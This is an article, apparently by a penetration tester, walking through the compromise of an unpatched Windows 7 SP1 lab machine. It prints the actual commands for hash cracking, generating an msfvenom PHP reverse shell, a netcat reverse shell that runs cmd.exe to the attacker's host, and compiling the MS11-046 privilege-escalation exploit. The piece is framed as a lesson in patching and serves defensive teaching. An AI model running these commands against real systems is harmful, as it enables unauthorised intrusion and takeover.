What happens when you don’t keep your system up to date.
Example of Hacking Windows 7 SP1 and owning System
First we start with an NMAP SCAN
root@kali:~# nmap -sV -sC 184.108.40.206 –top-ports 100 –reason –open
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-25 17:17 MDT
Nmap scan report for 220.127.116.11
Host is up, received arp-response (0.18s latency).
Not shown: 87 filtered ports
Reason: 87 no-responses
Some closed ports may be reported as filtered due to –defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
554/tcp open rtsp? syn-ack ttl 128
3306/tcp open mysql syn-ack ttl 128 MySQL (unauthorized; French)
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
5800/tcp open vnc-http syn-ack ttl 128 TightVNC (user: gamma; VNC TCP port: 5900)
|_http-title: TightVNC desktop [gamma]
5900/tcp open vnc syn-ack ttl 128 VNC (protocol 3.8)
| Protocol version: 3.8
| Security types:
| VNC Authentication (2)
| Tight (16)
| Tight auth subtypes:
|_ STDV VNCAUTH_ (2)
8080/tcp open http syn-ack ttl 128 Apache httpd 2.4.9 ((Win32) PHP/5.5.12)
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.9 (Win32) PHP/5.5.12
|_http-title: Site doesn’t have a title (text/html).
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 00:50:56:B8:4A:94 (VMware)
Service Info: Host: LAB1; OS: Windows; CPE: cpe:/o:microsoft:window
We then perform a directory brute force on port 8080 as per the info above in the nmap scan
We found the following: http://18.104.22.168:8080/php/install
downloaded the babinstall.sql
Searched for users in the db install file
found user email@example.com and some Password hashes : (dont try and crack these I changed them for this article)
We identified the above password hashes as MD5 hashes.
we proceed to crack them using hashcat and we found the passwords in plain text:
- 200cab26807d6bf99fd6f4f0d1ca54d4 = administrator
- 22995d8a5ed1b91445f6c55ac121505b = 012345678
We can now try to login to the admin panel of the web application using the firstname.lastname@example.org and password 012345678
and we are logged into the admin panel as administrator.
Looking around the application I noticed that we cannot upload any files . I then proceeded to find where to change the configuration for this and found it via the “site” page. I configured the correct parameters in order to allow me to upload a reverse shell. We need to keep in mind I am going to want to upload a *.php shell as nmap confirmed that php is what is running on the system . You can also confirm from the above the page ends in index.php
Since this is a windows system most of the php_reverse_shells are build for Linux systems so I will have to make my own windows php reverse shell. This is achieved running the following command in my attacking system:
msfvenom -p php/reverse_php LHOST=22.214.171.124 LPORT=443 -f raw > /var/www/html/WindowsPHPShells/myshellwin.php
I proceed to upload the shell to the uploads directory and then execute the shell at that directory by visiting the web directory. http://126.96.36.199:8080/php/123/fileManager/users/U1/Testing/myshellwin.php before doing so we need to create a listener on our attacking machine to catch the reverse connection.
creating the listener; nc -nlvp 443
We get the shell back to our attacking system . But wait its not a fully interactive shell and after a few minutes my shell dies /disconnects.
I proceed to upload nc.exe to the windows machine using the same method used when I uploaded the shell. Thinking that if I can hold a non interactive shell for at least one minute I can setup another reverse listener on our attacking system and execute a second reverse shell on the windows system to achieve the fully interactive shell.
On the windows system I got again my non interactive shell and quickly executed nc -nvv 188.8.131.52 4444 -e cmd.exe and on my attacking system I ran the command to start a second listener nc -nlvp 4444
And it worked !!! I have full shell with full functionality. I have hacked into this windows machine.
This is not where is stops, why ? we want to own the system and retrieve passwords from the system. If we are NT/Authority user we own and control this windows 7 machine.
User Privilege Escalation
First we look at systeminfo
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
Hotfixes are the latest patches and security updates installed
——- Patches (also listed as part of systeminfo) ——-
Caption Description HotFixID InstalledOn
http://support.microsoft.com/?kbid=2534111 Hotfix KB2534111 12/31/2014
http://support.microsoft.com/?kbid=3045171 Security Update KB3045171 5/11/2016
http://support.microsoft.com/?kbid=3124280 Security Update KB3124280 3/31/2017
http://support.microsoft.com/?kbid=4012212 Security Update KB4012212 2/8/2018
http://support.microsoft.com/?kbid=976902 Update KB976902 11/20/2010
In order to not make this article a long one I am skipping straight to the juicy stuff. Normally there is allot more being checked. Like what access users have to write to which files. Another check is to see if the folders are properly quoted , example “C:\Program Files\Program Name\” if its not properly quoted it means that an attacker can use this to escalate privileges to system because of the way Windows finds programs. Too explain this Windows will start as follows
C:\Program Files\Program and so on and so on. So basically all you need to do is place your malicious executable in the beginning of the program folder so that windows system executes this and boom you escalated your privileges. This however was not the case in this scenario and had to look at a kernel exploit.
Google foo for the the the OS version and service pack I found an exploit MS11-046 which describes a vulnerability in the windows Ancillary Function Driver. The Ancillary Function Driver for Winsock service is a kernel driver. If the Ancillary Function Driver for Winsock is stopped, the following services will not start and initialize ( DHCP Client and TCP/IP Netbois Helper ) it was fixed and patched in patch KB2503665.
I looked at Patches installed and verified that this patch was indeed not installed. So now we have a very strong possibility that we can escalate our users privileges to system authority. So lets try it.
I downloaded the exploit and compiled it since it was written in c. I ran the following command i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
I then uploaded the compiled exploit and ran the exploit as MS11-046.exe and there we have it the system is fully compromised and I am running as System/Authority.
Our next step is dumping windows credentials the reason we do this is because users normally use the same credentials on all systems which will make this process easier to pwn another system. We can dump network traffic and see if we can find any passwords being transmitted in clear text. If this machine is connected to a network and domain and we could retrieve domain admin credentials we could totally take over the whole network as the administrator password will be used on all systems.
Now you can see how important it is to keep your systems patched and updated. A compromise like this can destroy your business.
Hope you enjoyed this article.
Gerhard De Villiers-Mohr ( Ethical Hacker and Senior Penetration Tester )Report this
Status is onlineGerhard MohrPenetration Tester | Ethical Hacker | Red Team – Sphere Cyber Security UnitPublished • 3h18 articlesFollowhashtag#Hackinghashtag#Windows 7 hashtag#Penetration Testing How to compromise a windows 7 machine Sp1 not fully patched.